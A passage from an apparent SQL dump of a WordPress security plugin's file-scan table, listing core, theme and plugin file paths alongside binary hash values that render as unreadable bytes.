�h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('�=��=�tVc�/w','wp-content/themes/wp-simple/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|�sU�b;\Zy\rѽ>','�N,�GKA���|��*��Y$��\"\Zg^v��B�N�','',0,'?'),('�FRmQ���Ca7|�ܞc','wp-content/themes/saybusiness/js/stellar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H$��Q��(\'d_^��sh','�󓡂V�#���5�J��Gg��8����_�','',0,'?'),('�H��Ϲ�g!0\'�R��','wp-content/themes/brickyard/images/icon-home.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�Zm�JE�rZ��h','%�y/!�Š.T�!��80>>$�0�#�=l','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)�	>','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)p†M��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ե3<�Y5Ω8�z��;','�I&A ��k9H��xjW�;��JL�fS]z','',0,'?'),('�|z/�;2M��p\r�','wp-content/themes/graduate/assets/js/unminified/animation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[�V^o�t᳹=�q','‚ݰ�.��P���U�&]���>O��~��!I�','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MQ�@��Ǯ���I','����~�r�b�wTN�s��;3f��B���)A','',0,'?'),('���ኰ7����]T�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/dialog/dialog.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʘ�w�W�{�?�ڴ��}','j�M@X+�d�wӇ^QWs0�����Y�H','',0,'?'),('�ң\r�C��AkF�','wp-content/themes/graduate/inc/modules/trending-courses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(1��<*�*����!','�tPs?�h��[�v��a�r{�2k�\'�mY\"T�','',0,'?'),('���Q�ܑ������','wp-content/themes/enigma/core/admin/bootstrap/css/bootstrap.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cF/�5�*�|\r�TZ�','v}so%��\r��g\r�-���ߕ5<Ҽ��A\0','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa	y�fh��0v\'u�vm�','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����� v��d','W�Y�0����2w��	5�O���zm� ���^','',0,'?'),('��Kr�(i)�&#','wp-content/themes/graphene/template-threecolumnscenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*J�g�#�c��/���','���3�*����L��l/�T��7sX\r��','',0,'?'),('���`}��uv����','wp-content/themes/simpleshift/parts/companion/frontpage-test.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l���ڜWr�|t','h1x������p$��o.��l;���,�-��','',0,'?'),('��w��i.�w�(M;0D','wp-content/plugins/akismet/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��|���2-�#�','�J�S�\\<�Cޏ�=s\'WI&\Z�(���vaTo','',0,'?'),('���O͟�V��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/bin/release',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	\rY_-J�3�q�','k�%�Ҁ�w_3�P�S�٩��5�ڂ\r�G�۞','',0,'?'),('��0��l�P�EI�\0','wp-content/themes/Yegor/FT/js/colorset.js',0,'-�*Ј��`��_��','-�*Ј��`��_��','o�$�V�~,�e�qה2�$3���H�TZ���#�','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('���+_�01�f]:=z�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/scroll/simplescrollbars.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�o�J�m��E��','}[�V	d���\0��)�Ц��Cy\n��8�?\Z��ZY','',0,'?'),('���ws� ��+���C\'','wp-content/themes/twentytwenty/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�l���Ѽ	&.���','�_7�����\\�7�Hms��.:[)��dM�','',0,'?'),('�\Z��h^\Z����n','wp-content/themes/graphene/js/buttons/notice.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�M�)�����@���','��sa�s>m�+�V8,/y{,\04�O�ғ?i�U','',0,'?'),('��TYNc����R*','wp-content/themes/city-store/inc/customizer/functions/class-pro-discount.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�r��w4da�w�a1','L+����(To�T\"M{��y�9�� ��{���','',0,'?'),('�!��?	X�u;��l���','wp-content/themes/catch-flames/images/fixed-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�ߧ��{�K�[�&�','��Ӥ� ��t`���-���X V���P�pzW','',0,'?'),('�)�almV���ï\0�$','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-number.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8툐���w�N�A��7','�c�j�.\n�g�~�G���ŏDz�`n�=','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�E8|5Ź�Ъ��?K�','wp-content/themes/lovecraft/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W�WI����T�9','��B�d��t���ƪ��`͙u��&�y��Bk�','',0,'?'),('�X*����VL	�_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0}3�*�?�v�+,\"','&tT=����ȼitg`^�5����2G��Vcg<','',0,'?'),('�Yˆ뢖�E�3�sG�','wp-content/themes/catch-flames/footer.php',0,'r�&��?B�Pr���','r�&��?B�Pr���','�{����-ģ��n̞�&\n�Z�\"#\".��no\\','',0,'?'),('�Y�yT9�뙼v�۪','wp-content/themes/quicksand/js/tether.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]��(!��ȶ�w��� ','2�h	����KYj�ӰI��/�|n&,0�Ҩ','',0,'?'),('�d�X߬xg{9�h�a','wp-content/themes/newsmag/inc/widgets/posts_list_vertical/layouts/posts_list_vertical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')2���OL��h��','26��U^�2�m�V5u�l�7�\rd�;�?�o-','',0,'?'),('�j=ܑ\"Y1\03to;�','wp-content/themes/graphene/admin/images/template-twocolumnsright.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[����\Z���SӁ','E�J�\"�z��Z>�<�N��L�pǽ� �G��','',0,'?'),('�j��I���<꟟��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('������oK�a��','wp-content/themes/exoplanet/functions/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C�\\���.��W&�','�X�����f�#�K�xac\0��8w��`�1','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('��2u�\"<g�@�f�%','wp-content/plugins/wp-cerber/assets/flags/ki.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K���ȶ�','�\"�&9ʈ��7�lZ��P�퇢 �j�/','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('��.	�E�>���_��','wp-content/themes/exoplanet/page-features.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lx����\rJJ!1��B�','d<��P��(��C�7�(��Dw ��N�I_�V�O','',0,'?'),('��e�\\��1�tƋ�<	�','wp-content/plugins/wordfence/lib/wfUpdateCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&?C]�\\��g~�J;<:','3�*4��Sxg��\r�\Z\n�1?�N#?�a]��p','',0,'?'),('������G�G����a\"','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*M]YnM$^ù\"�','���ϐ�N���o�KtQ�V���\r3�-��y�-','',0,'?'),('���fsW;�1��','wp-content/themes/hitmag/inc/kirki/assets/js/controls/dropdown-pages.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ك�A;�iY/�','����@��L��Y{\"�����:NJ�Dq\"[','',0,'?'),('����Z|��0�75�o�','wp-includes/sodium_compat/src/Core32/Int32.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3��NM[�/�\r~H','�����r�W���Q@x[1� ���*o�9�$�','',0,'?'),('��B]nȄ�8�7g��','wp-includes/images/smilies/icon_rolleyes.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_5��6I���ĔE','b;�SG�`�JL�4�;ͮ1;\\����;xl��','',0,'?'),('���gh�!�[�L�d:�','wp-content/themes/graphene/admin/images/template-threecolumnscenter.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��jfi�9i��D��','�Y�Ț@4,\\��Q�(ÿ�GoS\r(ĘOT�o','',0,'?'),('��Q��	$�	�L�','wp-content/themes/graphene/images/social/blinklist.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H��##`Cو�z','9��?\\�\0�=D���^�b�������Ո@','',0,'?'),('���篯FSL����','wp-content/themes/wp-simple/inc/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u����C[(I�J7','�tLl\rm���r�;o�h��j���|;��','',0,'?'),('��fR/1����< PC�','wp-includes/js/dist/shortcode.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j����	Q�l�*,�I�','�� w6R�(�K�T%ni�1��0�����[r','',0,'?'),('����C��8<�>U�0','wp-content/themes/Kent/js/html5.js',0,'wnS���M�2KT�Z','wnS���M�2KT�Z','\r�gv�VPz0���\rH�%���*�%T�k�','',0,'?'),('�ޢ���~:s�;����','wp-content/themes/monograph/template-parts/content-home-featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w8Afus����<8�n','^Kl��O��8Y��M~������o��','',0,'?'),('�\0�� ��+M�&���','wp-content/themes/wp-simple/inc/kirki/includes/styles/class-kirki-styles-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z��R���Qb�?�iqT','��J�3l`��y���\Z��ր��\0�=$`(!���}','',0,'?'),('�s��C�{��}b(','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/eclipse.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�$\0 |�q�l�Z��','��gvZ�)jwf_Kۘ�k׵4nٽd����','',0,'?'),('����~ڴ:j��{Ơ','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ql���d#��:B��qV�','i>�-���JU:k�?����eB�\r�x�g�','',0,'?'),('���K�ȁ;$��z�','wp-includes/js/dist/notices.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m����5��F2�c�:į','�d��P��\'���Z8������ϭd�%9���AN','',0,'?'),('�,��8�,񸽶@$kH�','wp-content/themes/catch-responsive/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�V�+�\n<|�1�','QS��r�r��?$Xʦ�+]\n�L�\\�8߱�','',0,'?'),('�-�7VG\0Í��,��V','wp-content/themes/simpleshift/inc/kirki/assets/js/controls/multicheck.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\��Q�bP1�U�IS�','EDF/8��(��5`1AĶ�&�����P0@N','',0,'?'),('�G֖�z����c\\�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/radio-buttonset.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p7�3t#�tF(�O|C!','��pǻ�_o�y���`(.�g��\\�B���,','',0,'?'),('�HR3}��Zc�d�i','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-process-renamed-login-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�Q��$��� �o|C\\','�cS�؀/�8-(&�1H�4�����L�','',0,'?'),('�Mj�A�M��O�\"If','wp-includes/SimplePie/Net/IPv6.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r ��F�E��,�h�','p�t���[bm���M�_Iz�\"��[�j/�O�','',0,'?'),('�Ov�S�Dv�\rw]q�','wp-content/themes/exoplanet/functions/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���w	VQ�/���','7���ص7�3l�+Mk|�z�F��U�1�(�','',0,'?'),('�d��RĆC�P���b&','wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����\rW�����Н','%��?�\Z�v�bq]��g�5Z)u�Ѷ\Z�o�\'�0','',0,'?'),('�jC����[�kO�s��','wp-content/themes/brickyard/css/pie/PIE.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ծ<B�f}:��T�','?���<M��L5�|�`�5bo��߬b�\'fs�','',0,'?'),('�kIK����V[��	5�','wp-includes/sodium_compat/namespaced/Core/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��v>��#��!n�(','�DFUu|�v��/�]�2x_ERL2QlP93s	�15�','',0,'?'),('�lq��m�9�R:J?\Z','wp-content/themes/newsmag/assets/sass/navigation/_menus.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$]��Gm�y���l','tl[ݞ�+&?Z!��K �;)EC��\0͑�{�','',0,'?'),('�w�\Z�d�Ϣ�\ruD\"','wp-includes/IXR/class-IXR-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%p.<�Sǡ��z1Ϣ','Q�*k�_}��2���>T�q<�_S�:�Qh�','',0,'?'),('�xm�5��o�-]�Ž��','wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��J��x�_r�Z�','�6�� Ք���ۻ����!�|d�p�','',0,'?'),('��-f�����<ʪ	','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/tern/worker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ֵ_>wj�Ʊ��[��','�x������eP�@��3<—���� *\n<','',0,'?'),('���f�zda�.C�','wp-content/themes/city-store/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n۫�’�Mw\0�N','�0�Vw����L}�&3Hn�}�gn>���&�~f�','',0,'?'),('�����q�m&�y��','wp-content/themes/graphene/images/social/instagram.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�=t�f�ω�n�<','�t�����f�]�w�K*���v�؉�=�N�','',0,'?'),('���������*_�\"','wp-content/plugins/wp-cerber/assets/flags/tc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sp�I��7��03CP','[���V�c\"��Z}t�a�n��%PB\ZgF�Yw','',0,'?'),('����َ����A�|q�','wp-content/themes/hitmag/inc/kirki/assets/js/functions/set-setting-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�\\6:��vZ��;','w��vri����\n��`�4!���!��tx��S','',0,'?'),('���/��\Z��)y�\r','wp-includes/blocks/html/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-�FV�y�o����','���RA��A�ȧ/��r�4H�-@��(\n	�7R4�','',0,'?'),('��E\r�?��\r[Wo�n�H','wp-content/themes/graphene/style-bbpress.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��	���fц��Ja�','�\Z\Z�b�ŝ2{o�sOy��+f��W�ΐ�p','',0,'?'),('����QHa2f� �hb�','wp-content/themes/newsmag/inc/admin/welcome-screen/img/ajax-loader.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�j~��Ս:��M��$','!�T��K���{΀>��N�[�\'��,DR���̅*','',0,'?'),('��&�1��|����A���','wp-content/themes/lovecraft/genericons/font/Genericons.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�]���1�x\"��/~','����#5���#]��\"2ᩭ8p�&��=hl�','',0,'?'),('��$��xM1>�_8P\0','wp-includes/js/swfupload/swfupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����9��>&YRg','��ݙ���R�YY-�ҕ�&qW1(�K��','',0,'?'),('���w�T=��ɖ��[','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/selection/mark-selection.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�DA��Bd���}}','N�HӅ��RŸ���iVS�ә60�_?;�)�','',0,'?'),('��h�W̍��? �6','wp-content/themes/newsmag/assets/images/banner.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���̓8�Dun	\'\'O','�8� qp}�A��O�Ч]�IE�Jt�;�u���','',0,'?'),('��\nJ乐��1�cسDs','wp-content/themes/weblog/acmethemes/core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U.c�ø���e��','����Ĕ����m��t{����S�3����f�','',0,'?'),('���#N�-���:l�n','wp-content/themes/hitmag/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�ǣ������\0�<�','(%��O �CW��I�VXV����29�_��\\�','',0,'?'),('��@�)���dTӒ��','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-checkbox.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�����}�P��f�','CX��%�.�wC���TA6B<�\"w���c�5� l','',0,'?'),('��Qs|�c�L؜VH�)','wp-admin/includes/class-walker-nav-menu-checklist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?L�,k��|n�','�r�J�_9���~��uz�{�z������P','',0,'?'),('��/8&�D�g|��#','wp-includes/js/dist/viewport.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߙ��,���B�','H9����Y߈�݆��3L ��c���Jگ	=�','',0,'?'),('�\n)�U�0�\r�ͯ��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/scss/controls/date.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*��������ܵ&�','�]�4��˩SB�4K������7�~�\\��j','',0,'?'),('�\Z���M`�yᕙd�','wp-content/plugins/wp-cerber/assets/flags/cm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�.��`�t�sI01','���F�]��g�ZBN��to	Q��m�,�j','',0,'?'),('�!�^�87����I`','wp-content/themes/wp-simple/style.css',0,'��Dn�he�R@�:�&R','��Dn�he�R@�:�&R','^���1��:�җ^-��H�%[d6[��o��','',0,'?'),('�/q/\n#X4���ʂ�','wp-content/themes/graphene/loop-single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˶�7\nuE�U|�I@II�','�eQWg,YBz��#8Ҙ�q���Tq)$���5','',0,'?'),('�7\Z�U r� >��3�N','wp-content/themes/wp-simple/inc/kirki/autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�`���7��ZV�؅','�\nr^�a^�qXA%��V�4)0�6��ZOHS��','',0,'?'),('�@�D?��nv�9�*O','wp-content/themes/advance/inc/kirki/assets/scss/controls/slider.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�жu9�>��\\��B','sj��	6��V`f�\'jҧ��� �~I�nR','',0,'?'),('�C��bT�H�`W-M��_','wp-content/themes/enigma/css/font-awesome-4.7.0/scss/_list.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�9(\'_�B-”�','l���%�����xPXX#�5�M/�*l���','',0,'?'),('�H��1�����g��y','wp-content/themes/wp-simple/inc/kirki/assets/scss/controls/generic.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':X@P�rK\Zh��3=e_','5K�X���gٱ�#$W���p+D����','',0,'?'),('�Ox��ر��c5(','wp-includes/css/dist/block-library/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gs�Ib<���w]G��','כ�ppr��›xI�xP^�?	���N�%�u�','',0,'?'),('�k]�}>��9]ϟ�3��','wp-content/themes/advance/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Â�Z�?1gc	��M�','y5Le�oh�#�֬���փ�4��fH�z�','',0,'?'),('�n97�I.O�ҝ޿�','wp-includes/js/heartbeat.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^���@H�l�\Z�g2�','e�x\'�s��v+�q�LW����/,��k�g%\0�','',0,'?'),('�z�,��\"�R\0��	�','wp-content/themes/university-hub/template-parts/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�6�E��N���','h%�,��G\\4ΐ�e���м~Ƨ���)> �','',0,'?'),('�|Bl�IHҼ�OSƱ','wp-includes/js/mediaelement/mediaelement-migrate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�C�_hz�3��<7',',b#0�!a�OVc,��ؕSԏI�л%��p)��','',0,'?'),('���\r���ސ6d�i�p','wp-content/themes/enigma/core/admin/bootstrap/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)Ţ��pX�&\Z��','-u���f�_F�\nPc�1=m���rW������5','',0,'?'),('���ب&G�)�k{��','wp-includes/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��h���P���','K����d�%�.RAO�F��������jo�-','',0,'?'),('��M�Ӽ��7T�~���','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�kA�`�lw���y�','7\r4	춥Q\nc��>c\n>�Pf8�4��Hk�','',0,'?'),('��EH�CB�	�m�','wp-content/themes/Yegor/FT/colors.php',0,'|݄���Q���','|݄���Q���','SU��C��ZL҆A�;)�J��๤�\'�','',0,'?'),('���킙=�࠰�','wp-content/themes/wp-simple/inc/kirki/includes/field/class-kirki-field-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��>��•:\\)�O&','�*b]E�&�JαŠ�\\��4\0b1�>.w!�','',0,'?'),('��f餧xM�P]~B��','wp-content/plugins/akismet/class.akismet-cli.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z��� ���qE9g:I','v26�}۞���\Z�\no��g$�$�@[�C�\\V','',0,'?'),('���	,��Oq#��7(?','wp-content/themes/hitmag/inc/kirki/assets/scss/controls/radio-buttonset.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�j����ֽN@>�',' �\'9Н	�o��1Kf��y��q���n�0\\iA','',0,'?'),('�����R���{x{�','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�%>�̖�a����','�/���+�B��&J�:ť�f�D��J+ ����','',0,'?'),('��|	�n��a+�1��','wp-content/themes/hitmag/inc/kirki/includes/class-kirki-enqueue.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$�Vֱ	�;�Ƥ��','���CIz�q���	��P�h\'��-�dk���','',0,'?'),('����h+��B����','wp-includes/js/tw-sack.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7�X��wO��qa','k�\r<�I�-�Vsp�6gb4eb���fs�Ҹ��','',0,'?'),('��F�\"��vh�$Lb��','wp-includes/js/imgareaselect/border-anim-v.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �z!�<�7�����*�','��>���d�:���j1�<�!4�6�g��','',0,'?'),('���3�����/7T��','wp-content/themes/skt-pathway/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@v\Z��$�Hwi��+','η�X��e�0�C��/1��4�7I۵�7Ү','',0,'?'),('��A�U~J��o�%��[�','wp-content/themes/catch-flames/images/favicon.ico',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-������%���\nv�V','�.��^����B;��(\'�J�,X$]���]','',0,'?'),('�ȄXRZ�l�pr��?�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/bin/authors.sh',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W0Bw�֖ހ��q{��l','�ࠜf&��n�����E �ɥ�VѾm��.��','',0,'?'),('��˩6�f/�6YjI\0�W','wp-content/plugins/wordfence/modules/login-security/views/settings/options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��{��^vƍ����','Z��%��ĩZ�d�^����m���͖(8��ծ','',0,'?'),('����1էG18�z','wp-content/themes/hitmag/inc/kirki/includes/settings/class-kirki-settings-default-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`(��bꂙ�^u\':','�M��ef�܎>�y�e5���\\�N{$kk��','',0,'?'),('��MAH���\0�[d_�!','wp-content/plugins/wordfence/crypto/vendor/composer/autoload_namespaces.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�,}vĨ3��G��)�','E�r4@\0�ԡ$��z�3�$l��\Z�`i�ex�l�','',0,'?'),('��yc�0O�g)ρ�Mf�','wp-admin/network/site-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͢Ɵ6��ǰD�ۦ�','6i�b�؋��u-��L���^�	�v�4|f�%�Xg','',0,'?'),('�tDZ%������F','wp-content/plugins/wordfence/lib/wfNotification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Ǎ V2�(��dhVD','S�a��Y����gj+|�� ��J��M8��','',0,'?'),('��Fj]p� ���Ac\rp','wp-includes/Requests/Exception/HTTP/406.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K��l�h�r��9�\"\0�',',aY��}PR6���`�)K�f�ism 